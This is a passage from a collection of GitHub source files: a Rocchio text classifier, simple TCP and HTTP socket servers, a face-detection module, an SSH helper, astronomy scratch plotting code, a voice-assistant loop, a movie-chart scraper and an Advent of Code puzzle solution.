class_count[train_y[int(previous_doc)]-1] += 1\n temp = np.zeros(len(l_list))\n temp[index_dict[word_id]] = int(count)\n total_count = 0\n previous_doc = int(doc_id)\n else:\n temp[index_dict[word_id]] = int(count)\n total_count += int(count)\n\nfor i in range(20):\n class_vector[i] = class_vector[i] / class_count[i]\n\n# TESTING\n\ndef cosine(a, class_vector):\n a=np.array(a)\n class_vector = np.array(class_vector)\n dist = np.zeros(20, dtype=np.float64)\n for i in range(20):\n dist[i] = np.sum(abs(a-class_vector[i]))\n return np.argmin(dist)\n\nprevious_doc = 1\ny_expected = []\nconf_matrix = np.zeros((20, 20))\nwith open('matlab/train.label', 'r') as fp:\n for line in fp:\n y_expected.append(int(line.strip()))\n\ntotal_test_docs = len(y_expected)\ncorrect_classified = 0\n\nwith open('matlab/train.data', 'r') as fp:\n j = 0\n temp = np.zeros(len(l_list))\n total_count = 0\n for line in fp:\n doc_id, word_id, count = line.strip().split(' ')\n\n doc_id = int(doc_id)\n\n if previous_doc != doc_id:\n original = y_expected[int(previous_doc)-1]\n original -= 1 ######## to make range 0-19\n temp = temp / total_count\n predicted = cosine(temp, class_vector)\n\n if (predicted == original):\n correct_classified += 1\n conf_matrix[original][predicted] += 1\n temp = np.zeros(len(l_list))\n previous_doc = doc_id\n\n if word_id not in l_list:\n continue\n temp[index_dict[word_id]] = int(count)\n\nincorrect_classified = total_test_docs - correct_classified\nprint (correct_classified / total_test_docs)\n\n# print (\"Max: \" + int(temp))\n\n## Precision-Recall F-Score\n# print (conf_matrix)\n\nprecision = np.zeros(20)\nrecall = np.zeros(20)\nfor i in range(20):\n temp = 0\n for j in range(20):\n temp += conf_matrix[i][j]\n precision[i] = conf_matrix[i][i] / float(temp)\n\nfor j in range(20):\n temp = 0\n for i in range(20):\n temp += conf_matrix[i][j]\n recall[j] = 
conf_matrix[j][j] / float(temp)\n\nprint (precision)\nprint (recall)\n\nPrecision = np.average(precision)\nRecall = np.average(recall)\nprint ((Precision, Recall))\n\nF_Measure = (2 * Precision * Recall) / (Precision + Recall)\nprint (F_Measure)","repo_name":"ayushsahu1999/IR_Lab","sub_path":"rochhio.py","file_name":"rochhio.py","file_ext":"py","file_size_in_byte":3566,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"92"} +{"seq_id":"29460379523","text":"from socket import *\nfrom time import sleep\n\n\n\nHOST = ''\nPORT = 1112\nADDR = (HOST, PORT)\nBUFSIZE = 4096\n\nserv = socket(AF_INET, SOCK_STREAM)\n\nserv.bind((ADDR))\nserv.listen(5)\n\n\nprint(\"Waiting for connections...\")\n# accept the connection\nconn, addr = serv.accept()\n\nstring = \"Connected\"\nstring_encoded = string.encode()\nconn.send(string_encoded)\nprint(\"...connected!\")\n\nwhile True:\n\n    data = conn.recv(1024)\n    print(data)\n    sleep(0.5)\n    decoded = data.decode('utf-8')\n    if (decoded == \"quit\\n\"):\n        print(\"Shutdown\")\n        conn.close()\n        break\n    # conn.send(data)\n\n    # decoded = data.decode('utf-8')\n    \n    # print(\"Received:\")\n    # print(decoded)\n    # try:\n    #     conn.send(data)\n    # except BrokenPipeError:\n    #     print(\"Broken pipe\")\n    # if (decoded == \"quit\"):\n    #     print(\"Shutdown\")\n    #     conn.close()\n    #     break","repo_name":"LauriVuori/Embedded-rasbi-ardu-avr-etc","sub_path":"RaspberryProjects/tcpSocket/tcpServer.py","file_name":"tcpServer.py","file_ext":"py","file_size_in_byte":942,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"92"} +{"seq_id":"11410465996","text":"# --------------------\r\n# ---- the module ----\r\n# --------------------\r\n\r\nimport cv2\r\nimport mediapipe as mp\r\nimport time\r\n\r\nclass FaceDetection():\r\n    def __init__(self, detection_confidence=0.76):\r\n        self.detection_confidence = detection_confidence\r\n\r\n        self.cap = cv2.VideoCapture(0)\r\n\r\n        self.mp_faces = mp.solutions.face_detection\r\n        self.faces = self.mp_faces.FaceDetection(self.detection_confidence)\r\n\r\n        self.mp_draw = mp.solutions.drawing_utils\r\n    \r\n    def find_faces(self, img, draw=True):\r\n        self.img_rgb = cv2.cvtColor(img, cv2.COLOR_BGR2RGB)\r\n        self.results = self.faces.process(self.img_rgb)\r\n        \r\n        bounding_boxes = []\r\n\r\n        if draw and self.results.detections:\r\n            for id, detection in enumerate(self.results.detections):\r\n                bbox_location = detection.location_data.relative_bounding_box\r\n                h, w, c = img.shape\r\n                bounding_box = int(bbox_location.xmin * w), int(bbox_location.ymin * h), int(bbox_location.width * w), \\\r\n                int(bbox_location.height * h)\r\n                bounding_boxes.append([id, bounding_box, detection.score])\r\n\r\n                img = self.custom_draw(img, bounding_box)\r\n                cv2.putText(img, str(int(detection.score[0]*100))+\"%\", (bounding_box[0], bounding_box[1]-10), \\\r\n                cv2.FONT_HERSHEY_COMPLEX, 0.7, (33, 10, 89), 2)\r\n\r\n        return img, bounding_boxes\r\n    \r\n    def custom_draw(self, img, bounding_box, lenght=30, thickness=10):\r\n        up_left, down_left, w, h = bounding_box\r\n        up_right, down_right = up_left + w, down_left + h\r\n\r\n        cv2.rectangle(img, bounding_box, (76, 99, 20), 2)\r\n\r\n        cv2.line(img, (up_left, down_left), (up_left+30, down_left), (76, 99, 20), thickness)\r\n        cv2.line(img, (up_left, down_left), (up_left, down_left+30), (76, 99, 20), thickness)\r\n\r\n        cv2.line(img, (up_right, down_right), (up_right-30, down_right), (76, 99, 20), thickness)\r\n        
cv2.line(img, (up_right, down_right), (up_right, down_right-30), (76, 99, 20), thickness)\r\n\r\n return img\r\n\r\ndef main():\r\n detector = FaceDetection()\r\n cap = cv2.VideoCapture(0)\r\n current_time = 0\r\n previous_time = 0\r\n fps = 0\r\n\r\n while True:\r\n succes, img = cap.read()\r\n current_time = time.time()\r\n img, bounding_boxes = detector.find_faces(img)\r\n fps = int(1/(current_time-previous_time))\r\n previous_time = current_time\r\n cv2.putText(img, str(fps), (5, 35), cv2.FONT_HERSHEY_COMPLEX, 1, (0, 0, 0), 3)\r\n\r\n cv2.imshow(\"Video\", img)\r\n cv2.waitKey(1)\r\n\r\nif __name__ == \"__main__\":\r\n main()","repo_name":"JekPasan/Face-Tracking-Project","sub_path":"face-detection/face_detection_module.py","file_name":"face_detection_module.py","file_ext":"py","file_size_in_byte":2675,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"92"} +{"seq_id":"43513854048","text":"import subprocess\nfrom tempfile import NamedTemporaryFile\n\nclass Ssh:\n\n def __init__(self, identity, host, username):\n self.userHostStr = username + '@' + host\n self.ssh_args = [\"ssh\", \"-i\", identity, \"-o\", \"StrictHostKeyChecking=no\"]\n self.sftp_args = [\"sftp\", \"-i\", identity, \"-o\", \"StrictHostKeyChecking=no\"]\n\n def setup_env(self): \n script = \"\"\"@\n@mkdir runner\n@cd runner\n@mkdir build\n@mkdir cache\n@mkdir scripts\n\"\"\"\n self._run_sftp_script(script)\n\n def copy_file(self, src, dst):\n script = \"@put \\\"{}\\\" \\\"{}\\\"\".format(src,dst)\n self._run_sftp_script(script)\n\n def test_connect(self, timeout=30):\n return self.run_command('exit', options=['-o', 'ConnectTimeout={}'.format(timeout)], check=False)\n\n def run_command(self, cmd, options=[], check=True):\n args = list(self.ssh_args)\n args.extend(options)\n args.extend([self.userHostStr, cmd])\n return subprocess.run(args, check=check)\n\n def _run_sftp_script(self, str):\n with NamedTemporaryFile() as f:\n f.write(str.encode('ascii'))\n f.flush()\n \n args = list(self.sftp_args)\n args.extend([\"-b\", f.name, self.userHostStr])\n\n subprocess.run(args, check=True)\n\n","repo_name":"tue-robotics/vm_tools","sub_path":"src/vm_tools/ssh.py","file_name":"ssh.py","file_ext":"py","file_size_in_byte":1289,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"92"} +{"seq_id":"4244938055","text":"# CONTAINS SCRATCH CODE\n\n# Old column creation functions that I don't use anymore\n\ndef frobenius_norm(r):\n \"\"\"\n Takes in a matrix r and returns its frobenius distance\n from 2 * identity\n \"\"\"\n return np.sqrt(np.sum(np.square(r - 2*np.eye(2))))\n\n\ndef sum_abs_differences(r):\n \"\"\"\n Takes in a matrix r and returns the sum of the element-wise distances\n from 2 * identity\n \"\"\"\n return np.sum(np.absolute(r - 2*np.eye(2)))\n\n\ndef identify_psf_profile(obj):\n \"\"\"\n Takes in a galsim PSF object and returns a tuple\n of its type and relevant parameters\n \"\"\"\n\n # TODO incorporate more types of PSF profiles\n\n if isinstance(obj, galsim.gaussian.Gaussian):\n return ('Gaussian', obj.flux, obj.sigma)\n if isinstance(obj, galsim.moffat.Moffat):\n return ('Moffat', obj.flux, obj.beta, obj.half_light_radius)\n\n\ndef create_psf_parameter_columns(dataframe, object_column_name):\n \"\"\"\n \"\"\"\n dataframe[object_column_name + '_type'] = [identify_psf_profile(obj)[0] for obj in dataframe[object_column_name]]\n\n gauss_flux = []\n gauss_sigma = []\n\n moffat_flux = []\n moffat_beta = []\n moffat_hlr = []\n\n\n for obj in 
dataframe[object_column_name]:\n profile_tuple = identify_psf_profile(obj)\n profile_type = profile_tuple[0]\n\n if profile_type == 'Gaussian':\n gauss_flux.append(profile_tuple[1])\n gauss_sigma.append(profile_tuple[2])\n\n for lst in [moffat_flux, moffat_beta, moffat_hlr]:\n lst.append(np.nan)\n\n if profile_type == 'Moffat':\n moffat_flux.append(profile_tuple[1])\n moffat_beta.append(profile_tuple[2])\n moffat_hlr.append(profile_tuple[3])\n\n for lst in [gauss_flux, gauss_sigma]:\n lst.append(np.nan)\n\n\n dataframe[object_column_name + '_gaussian_flux'] = gauss_flux\n dataframe[object_column_name + '_sigma'] = gauss_sigma\n dataframe[object_column_name + '_moffat_flux'] = moffat_flux\n dataframe[object_column_name + '_beta'] = moffat_beta\n dataframe[object_column_name + '_half_light_radius'] = moffat_hlr\n\n\ndef apply_metric(dataframe, metric):\n \"\"\"\n Takes in the function metric (that acts on a 2x2 np array)\n and adds a column to the dataframe passed in with that metric applied to\n each row\n \"\"\"\n dataframe[metric.__name__] = list(map(metric, dataframe['R']))\n\n\ndef true_psf_column_gaussian(dataframe):\n\n dataframe['true_psf_sigma'] = list(map(lambda obj: obj.sigma, dataframe['true_psf']))\n return dataframe\n\n\ndef true_psf_column_moffat(dataframe):\n dataframe['true_psf_fwhm'] = list(map(lambda obj: obj.fwhm, dataframe['true_psf']))\n\n\ndef gal_psf_ratio_gaussian(dataframe):\n\n dataframe['gal_sigma'] = list(map(lambda gal: gal.sigma, dataframe['original_gal']))\n dataframe['gal_psf_ratio'] = dataframe['gal_sigma'] / dataframe['true_psf_sigma']\n\n return dataframe\n\n\ndef gal_psf_ratio_moffat(dataframe):\n dataframe['gal_fwhm'] = list(map(lambda gal: gal.fwhm, dataframe['original_gal']))\n dataframe['gal_psf_ratio'] = dataframe['gal_fwhm'] / dataframe['true_psf_fwhm'] \n\n# Old plotting functions that I don't need anymore\ndef r_vs_calshearmag(dataframe):\n\n # test plotting R closeness to 2I vs. calibration shear magnitude\n grouped_by_dg = dataframe.groupby('dg1').mean()\n grouped_by_dg = grouped_by_dg[['frobenius_norm', 'sum_abs_differences']] # don't need to include dg1 because that's the table\n print(grouped_by_dg.index.name) # accessing name of variable indexed by\n print(grouped_by_dg.index.values) # to access the variable grouped by, need to do df.index.values\n\n fig, axs = plt.subplots(1, 1)\n\n frob = axs.scatter(grouped_by_dg.index.values, grouped_by_dg['frobenius_norm'])\n sumdif = axs.scatter(grouped_by_dg.index.values, grouped_by_dg['sum_abs_differences'])\n axs.set_ylim([0, 1.25])\n axs.set_xticks(grouped_by_dg.index.values)\n axs.legend([frob, sumdif], ['frobenius distance', 'sum of absolute differences', ])\n axs.set_title('R closeness to 2I vs. calibration shear magnitude')\n axs.set_xlabel('calibration shear magnitude')\n plt.savefig('plots/closeness_dg.png')\n plt.show()\n\n\ndef r_vs_reconv_profile(dataframe):\n\n # \"PSF reconvolution profile does not matter\"\n grouped_by_reconv_type = dataframe.groupby('reconv_psf_type').mean()\n print(grouped_by_reconv_type) # gives some weird values that shouldn't be there. 
Gaussian has non Nan value in grouped_by table for reconv_psf parameters #TODO why??\n # grouped_by_reconv_type.to_csv('table2.csv')\n\n\n fig, axs = plt.subplots(1, 1)\n x = np.asarray([0.2, 1.0])\n frob = axs.bar(x, grouped_by_reconv_type['frobenius_norm'], width=0.2)\n sumdif = axs.bar(x + 0.2, grouped_by_reconv_type['sum_abs_differences'], width=0.2)\n axs.set_xticks([0.3, 1.1])\n axs.set_xticklabels(['Gaussian', 'Moffat'])\n axs.legend([frob, sumdif], ['frobenius distance', 'sum of absolute differences'])\n axs.set_title('R closeness to 2I vs. reconvolution psf profile')\n axs.set_xlabel('reconvolution PSF profile')\n plt.savefig('plots/closeness_reconv_psf_type.png')\n plt.show()\n\n\ndef r_vs_gaussian_deconv_psf_size(dataframe):\n\n # Seeing the effect of deconvolution PSF size (Gaussian only) on R\n grouped_by_deconv_size_gaussian_mean = dataframe.groupby('deconv_psf_sigma').mean()\n grouped_by_deconv_size_gaussian_stdev = dataframe.groupby('deconv_psf_sigma').std()\n\n fig, axs = plt.subplots(1, 2, figsize=(16, 8))\n\n true_psf_sigma = 1.0 / 2.355\n sigmas = grouped_by_deconv_size_gaussian_mean.index.values\n dist_from_true = sigmas - true_psf_sigma * np.ones(len(sigmas))\n\n # frob = axs[0].plot(sigmas, grouped_by_deconv_size_gaussian_mean['frobenius_norm'], label='frobenius distance')\n # sumdif = axs[1].plot(sigmas, grouped_by_deconv_size_gaussian_mean['sum_abs_differences'], label='sum of absolute differences')\n frob_stdevs = axs[0].errorbar(sigmas, grouped_by_deconv_size_gaussian_mean['frobenius_norm'], yerr=grouped_by_deconv_size_gaussian_stdev['frobenius_norm'], capsize=5.0, label='frobenius distance')\n sumdif_stdevs = axs[1].errorbar(sigmas, grouped_by_deconv_size_gaussian_mean['sum_abs_differences'], yerr=grouped_by_deconv_size_gaussian_stdev['sum_abs_differences'], capsize=5.0, label='sum of absolute differences')\n\n for ax in axs:\n actual = ax.axvline(true_psf_sigma, 0, 1, color='r', label='true PSF sigma')\n ax.legend(loc=1)\n\n fig.suptitle('Closeness of R matrix to 2*I for Gaussian deconvolution PSFs of varying sizes')\n\n plt.savefig('plots/deconv_gaussian_sigma.png')\n plt.show()\n\n\ndef r_vs_gaussian_deconv_psf_size_violin(dataframe):\n\n # Violin plots for the same data\n gaussian_subframe = dataframe[dataframe['deconv_psf_type'] == 'Gaussian']\n gaussian_subframe = gaussian_subframe[dataframe['reconv_psf_type'] == 'Gaussian']\n sigma_distribution = gaussian_subframe[['deconv_psf_sigma', 'frobenius_norm', 'sum_abs_differences']]\n\n grouped = sigma_distribution.groupby(by='deconv_psf_sigma')\n values = []\n frob_dataset = []\n sumdif_dataset = []\n for name, group in grouped:\n print(name)\n values.append(name)\n frob_dataset.append(group['frobenius_norm'].to_numpy())\n sumdif_dataset.append(group['sum_abs_differences'].to_numpy())\n\n fig, axs = plt.subplots(1, 2, figsize = (16, 8))\n width = 0.1\n axs[0].violinplot(frob_dataset, positions=values, showmeans=True, widths=np.ones(len(values))*width)\n axs[1].violinplot(sumdif_dataset, positions = values, showmeans=True, widths=np.ones(len(values))*width)\n axs[0].set_title('Frobenius Distance')\n axs[1].set_title('Sum of element-wise absolute differences')\n\n true_psf_sigma = 1.0 / 2.355\n for ax in axs:\n actual = ax.axvline(true_psf_sigma, 0, 1, color='orange', label='true PSF sigma')\n ax.legend()\n ax.set_xlabel('Deconvolution PSF sigmas')\n\n fig.suptitle('Closeness of R to 2I for different deconvolution PSF sizes')\n\n version = 1\n if not os.path.exists('plots/violinplot.png'):\n 
plt.savefig('plots/violinplot.png')\n\n else:\n while os.path.exists('plots/violinplot' + '(' + str(version) + ').png'):\n version += 1\n\n plt.savefig('plots/violinplot' + '(' + str(version) + ').png')\n\n plt.show()\n\n\ndef sanity_check_1(dataframe):\n print(dataframe.columns)\n # print(dataframe['deconv_psf'])\n # print(dataframe['true_psf'])\n\n fig, axs = plt.subplots(2, 2, figsize=(12, 9))\n\n # fixing plotting scales\n diagmax = np.max([np.max(dataframe['R_11']), np.max(dataframe['R_22'])])\n print(diagmax)\n diagmin = np.min([np.min(dataframe['R_11']), np.min(dataframe['R_22'])])\n offdiagmax = np.max([np.max(dataframe['R_21']), np.max(dataframe['R_12'])])\n print(offdiagmax)\n offdiagmin = np.min([np.min(dataframe['R_21']), np.min(dataframe['R_12'])])\n\n scaling_factor = 1.01\n for i in range(2):\n for j in range(2):\n element_string = 'R_' + str(i + 1) + str(j + 1)\n axs[i][j].set_title(element_string)\n axs[i][j].plot(dataframe['true_psf_sigma'], dataframe[element_string])\n axs[i][j].tick_params(labelright=True)\n axs[i][j].set_xlabel('True PSF sigma)')\n\n if i == j:\n axs[i][j].set_ylim(top=2 + scaling_factor * (diagmax - 2), bottom=diagmin)\n else:\n axs[i][j].set_ylim(top=scaling_factor * offdiagmax, bottom=offdiagmin)\n\n fig.suptitle('Shear response matrix element values vs true PSF size')\n\n save_fig_to_plots('element_plot')\n\n plt.show()\n\n\n# generation function for early plot where I forgot to plot ratios\ndef sanity_check_1():\n # TODO change units to be in fwhm\n\n gal_flux = 1.e5\n gal_sigma = 2.\n gal = galsim.Gaussian(flux=gal_flux, sigma=gal_sigma)\n\n # initial shear\n dg1 = 0.00\n dg2 = 0.00\n\n # Original PSF size / galaxy size variations\n\n true_psf_vary_sigma = [galsim.Gaussian(flux=1., sigma=sig) for sig in 1 / 2.355 * np.arange(0.5, 1.3, 0.1)]\n\n observed_galaxy_variation = [metacal.generate_observed_galaxy(gal, psf, dg1, dg2) for psf in true_psf_vary_sigma]\n\n # Deconvolution PSF type and size variations\n deconv_Gaussian_size_variation = [galsim.Gaussian(flux=1., sigma=sig) for sig in\n 1 / 2.355 * np.arange(0.5, 1.3, 0.1)]\n\n # Reconvolution PSF type and size variations TODO Look up by how much the reconvolution PSF is dilated\n dilation_factor = 1.2\n reconv_Gaussian_size_variation = [galsim.Gaussian(flux=1., sigma=sig) for sig in\n 1 / 2.355 * dilation_factor * np.arange(0.5, 1.3, 0.1)]\n\n dg = [0.01] # same as Sheldon and Huff value\n\n # Creating long master list of all combinations to loop through\n combination_list = []\n for i in range(len(observed_galaxy_variation)):\n for delta_g in dg:\n combination_list.append((observed_galaxy_variation[i], true_psf_vary_sigma[i], deconv_Gaussian_size_variation[i], reconv_Gaussian_size_variation[i], delta_g, delta_g))\n\n return combination_list\n\n\n","repo_name":"sidneymau/shear-estimator-sensitivity","sub_path":"scripts/Metacalibration/scratchcode.py","file_name":"scratchcode.py","file_ext":"py","file_size_in_byte":11173,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"92"} +{"seq_id":"33486534630","text":"\"\"\"The Ada Module.\"\"\"\nimport logging\n\nfrom .conversation import Conversation\nfrom .homeassistant import HomeAssistant\nfrom .hotword import Hotword\nfrom .microphone import Microphone\nfrom .options import Options\nfrom .speech import Speech\nfrom .voice import Voice\n\n_LOGGER = logging.getLogger(__name__)\n\n\nclass Ada:\n \"\"\"Hey Ada assistant.\"\"\"\n\n def __init__(self, options: Options):\n \"\"\"Initialize ada.\"\"\"\n 
self.homeassistant = HomeAssistant(options)\n self.hotword: Hotword = Hotword()\n self.speech: Speech = Speech(self.homeassistant)\n self.conversation: Conversation = Conversation(self.homeassistant)\n self.voice: Voice = Voice(self.homeassistant, options)\n self.microphone: Microphone = Microphone(\n self.hotword.frame_length, self.hotword.sample_rate\n )\n\n def run(self) -> None:\n \"\"\"Run Ada in a loop.\"\"\"\n self.microphone.start()\n try:\n self._run()\n finally:\n self.microphone.stop()\n\n def _run(self) -> None:\n \"\"\"Internal Runner.\"\"\"\n while True:\n pcm = self.microphone.get_frame()\n\n if not self.hotword.process(pcm):\n continue\n _LOGGER.info(\"Detect hotword\")\n\n # Start conversation\n wait_time = 2\n while True:\n text = self.speech.process(self.microphone, wait_time)\n if not text or text == \"Stop.\":\n break\n\n answer = self.conversation.process(text)\n if not answer:\n break\n\n if not self.voice.process(answer):\n break\n wait_time = 3\n","repo_name":"home-assistant/ada","sub_path":"ada/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1705,"program_lang":"python","lang":"en","doc_type":"code","stars":101,"dataset":"github-code","pt":"92"} +{"seq_id":"40312571036","text":"'''\n使用requests + bs4抓取猫眼电影top100排行榜电影信息\n保存数据到txt文件与json文件\n'''\n# 引入相关库\nimport requests\nfrom bs4 import BeautifulSoup\nimport random\nimport json\n\ndef get_agent():\n\tagents = [\n\t\t'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0;',\n 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv,2.0.1) Gecko/20100101 Firefox/4.0.1',\n 'Opera/9.80 (Macintosh; Intel Mac OS X 10.6.8; U; en) Presto/2.8.131 Version/11.11',\n 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_0) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.56 Safari/535.11',\n 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; 360SE)'\n\t]\n\tagent = {}\n\tagent['User-Agent'] = random.choice(agents)\n\n\treturn agent\n\n# 获取页面内容\ndef get_html(url):\n\ttry:\n\t\tr = requests.get(url, headers=get_agent(), timeout=30)\n\t\tr.raise_for_status()\n\t\tr.encoding = 'utf-8'\n\t\treturn r.text\n\texcept:\n\t\treturn \"get html error\"\n\n# 解析页面内容\ndef parse_html(url, base_url):\n\thtml = get_html(url)\n\tsoup = BeautifulSoup(html, 'lxml')\n\tcomments = [] # 存放所有电影信息\n\tall_info = soup.find('dl', class_=\"board-wrapper\") # 确定所有电影信息存放位置\n\tdds = all_info.find_all('dd') # 获取所有电影内容\n\tfor dd in dds:\n\t\t# 存放每部电影信息\n\t\tcomment = {}\n\t\t# 电影排名\n\t\tcomment['index'] = dd.find('i', class_=\"board-index\").text\n\t\t# 电影标题\n\t\tcomment['title'] = dd.find('p', class_=\"name\").a.text\n\t\t# 主演\n\t\tcomment['actor'] = dd.find('p', class_=\"star\").text.strip()[3:]\n\t\t# 电影链接\n\t\tcomment['link'] = base_url + dd.find('p', class_=\"name\").a['href']\n\t\t# 上映时间\n\t\tcomment['time'] = dd.find('p', class_=\"releasetime\").text.strip()[5:]\n\t\t# 评分\n\t\tint_s = dd.find('i', class_=\"integer\").text\n\t\tfra_s = dd.find('i', class_=\"fraction\").text\n\t\tcomment['score'] = int_s + fra_s\n\t\t# 电影宣传图\n\t\tcomment['image'] = dd.find('img', class_=\"board-img\")['data-src']\n\n\t\tcomments.append(comment)\n\n\treturn comments\n\n# 保存文件\ndef save_file(result):\n\t# 保存到txt\n\twith open('mytop100.txt', 'a+', encoding='utf-8') as f:\n\t\tfor comment in result:\n\t\t\tf.write('排名: {}\\t标题: {}\\t主演: {}\\n链接: {}\\n上映时间: {}\\t评分: {}\\n宣传图: {}\\n\\n'.format(\n\t\t\t\tcomment['index'], comment['title'], comment['actor'], comment['link'], comment['time'],comment['score'],comment['image']))\n\n\t# 保存到json\n\twith 
open('mytop100.json', 'a+', encoding='utf-8') as f:\n\t\tf.write(json.dumps(result, ensure_ascii=False) + '\\n')\n\n\tprint(\"当前页面保存完成\")\n# 保存图片\ndef save_image(result):\n\tfor comment in result:\n\t\twith open('{}.jpg'.format(comment['title']), 'wb+') as f:\n\t\t\tf.write(requests.get(comment['image']).content)\n\n# 主程序执行过程\ndef main(page):\n\tbase_url = 'http://maoyan.com'\n\tmain_url = 'http://maoyan.com/board/4?offset='\n\turl_list = []\n\n\t# 保存所有页面\n\tfor i in range(page):\n\t\turl = main_url + str(i*10)\n\t\turl_list.append(url)\n\n\t# 解析每一个页面\n\tfor url in url_list:\n\t\tresult = parse_html(url, base_url)\n\t\tsave_file(result)\n\t\tsave_image(result)\n\n# 执行主程序\nif __name__ == '__main__':\n\toffset = 10\n\tmain(offset)","repo_name":"liuzhonghua0831/beautifulsoup","sub_path":"maoyan_top100.py","file_name":"maoyan_top100.py","file_ext":"py","file_size_in_byte":3157,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"92"} +{"seq_id":"19308453943","text":"import socket\n\nHOST= '127.0.0.1'\n\nPORT = 8989\n\nmy_socket = socket.socket(socket.AF_INET,socket.SOCK_STREAM)\nmy_socket.setsockopt(socket.SOL_SOCKET,socket.SO_REUSEADDR,1)\nmy_socket.bind((HOST,PORT))\nmy_socket.listen(1)\n\nprint('Serving on port ',PORT)\n\nwhile True:\n clientconnection,address = my_socket.accept()\n request = clientconnection.recv(1024).decode('utf-8')\n # Split request from spaces\n string_list = request.split(' ') \n print(request)\n method = string_list[0]\n requested_file = string_list[1]\n\n print('Client request ', requested_file)\n\n filename = requested_file.split('?')[0] \n # get rid of the / to get the filename\n filename = filename.lstrip('/')\n \n try:\n file = open(filename,'rb') # read file in byte format\n response = file.read()\n file.close()\n\n header = 'HTTP/1.1 200 OK\\n'\n\n # determining the file type to render in the browser\n if(filename.endswith(\".jpg\")):\n mimetype = 'image/jpg'\n elif(filename.endswith(\".css\")):\n mimetype = 'text/css'\n elif(filename.endswith(\".mp4\")):\n mimetype = 'video/mp4'\n elif(filename.endswith(\".mp3\")):\n mimetype = 'audio/mp3'\n else:\n mimetype = 'text/html'\n\n header += 'Content-Type: '+str(mimetype)+'\\n\\n'\n\n except Exception as e:\n #when the file is not found by the server\n # display error message\n header = 'HTTP/1.1 404 Not Found\\n\\n'\n response = '
404 Not Found
'.encode('utf-8')\n\n final_response = header.encode('utf-8')\n final_response += response\n clientconnection.send(final_response)\n clientconnection.close()\n","repo_name":"Mehezabin/CSI-4118","sub_path":"A3/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":1723,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"92"} +{"seq_id":"37701926031","text":"import os\nimport pathlib\n\n\ndef find_files(root_directory, extensions: list[str], recursive: bool = False):\n available_files = (\n _find_files_recursively(root_directory, extensions=extensions)\n if recursive\n else [f for f in os.listdir() if _get_extension(f) in extensions]\n )\n\n return available_files\n\n\ndef _find_files_recursively(root_directory, extensions: list[str]):\n available_files = []\n for root, _, files in os.walk(root_directory):\n for filename in files:\n if _get_extension(filename) in extensions:\n available_files.append(os.path.join(root, filename))\n return available_files\n\n\ndef _get_extension(file_name):\n return pathlib.Path(file_name).suffix.lower()\n","repo_name":"tammohesselink/rekordbox-proof-audio-conversion","sub_path":"audio_conversion_tools/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":742,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"92"} +{"seq_id":"2861245267","text":"import numpy as np\n\nwith open(\"puzzle4.txt\") as file:\n nums = [int(x) for x in file.readline().split(',')]\n lines = [[int(x) for x in line.strip().split()] for index,line in enumerate(file.readlines()) if index % 6 != 0]\n\n boards = []\n for i in range(0, len(lines), 5):\n b = np.array(lines[i:i+5])\n boards.append(b)\n \n found = False\n done = False\n remaining = [x for x in range(len(boards))]\n for num in nums:\n # print(\"Calling number: \", num)\n for b in range(len(boards)):\n if b not in remaining: continue\n\n boards[b] = np.where(boards[b] == num, -1, boards[b])\n found = np.isin(-5, [boards[b].sum(0), boards[b].sum(1)])\n done = found and len(remaining) == 1\n if found:\n remaining.remove(b)\n if len(remaining) < 1: break\n if done: break\n \n print(boards[b])\n\n print(\"Lucky board:\", b)\n board = np.where(boards[b] < 0, 0, boards[b])\n sum = board.sum(0).sum(0).item(0)\n print(\"The sum is:\", sum)\n print(\"The number is:\", num)\n print(\"Total score: \", sum * num)\n \n\nimport numpy as np\nn, *b = open(0) # read input from stdin\nb = np.loadtxt(b, int).reshape(-1,5,5) # load boards into 3D array\n\nfor n in map(int, n.split(',')): # loop over drawn numbers\n b[b == n] = -1 # mark current number as -1\n m = (b == -1) # get all marked numbers\n win = (m.all(1) | m.all(2)).any(1) # check for win condition\n if win.any():\n print((b * ~m)[win].sum() * n) # print winning score\n b = b[~win] # remove winning board","repo_name":"itsPeetah/aoc-2021","sub_path":"previous/puzzle4_2.py","file_name":"puzzle4_2.py","file_ext":"py","file_size_in_byte":1719,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"92"} +{"seq_id":"32873712372","text":"import unittest\n\nfrom indigo.models import initialise\nfrom indigo.util import (\n split,\n)\nfrom indigo.models import (\n Collection,\n Resource,\n)\n\n\nclass IndigoTestCase(unittest.TestCase):\n\n\n def setUp(self):\n initialise()\n\n\n def create_collection(self, path):\n container, name = split(path)\n Collection.create(name, container)\n\n\n def create_resource(self, path):\n container, name = 
split(path)\n Collection.create(name, container)\n\n\n def delete_collection(self, path):\n Collection.delete_all(path)\n\n\n","repo_name":"Indigo-Uliv/indigo","sub_path":"tests/common.py","file_name":"common.py","file_ext":"py","file_size_in_byte":561,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"92"} +{"seq_id":"1293612711","text":"#!/usr/bin/env python3\n\nimport networkx as nx\nimport math\nimport tensorflow as tf\nimport os\nimport sys\nimport shutil\nimport csv\nimport numpy as np\nfrom utils.eval_utils import _start_shell\nfrom random import shuffle\nimport pickle\nimport argparse\nimport subprocess\nimport progressbar\nfrom datetime import datetime\nimport glob\nfrom models.embedding_network import EmbeddingNetwork\nimport scipy\n\n\ndef normalize_data(samples):\n attr_names = {\n 'num_calls': [],\n 'num_transfer': [],\n 'num_arithmetic': [],\n 'num_instructions': [],\n 'betweenness_centrality': [],\n 'num_offspring': [],\n 'num_string': [],\n 'num_numeric_constant': []}\n\n for attr_name 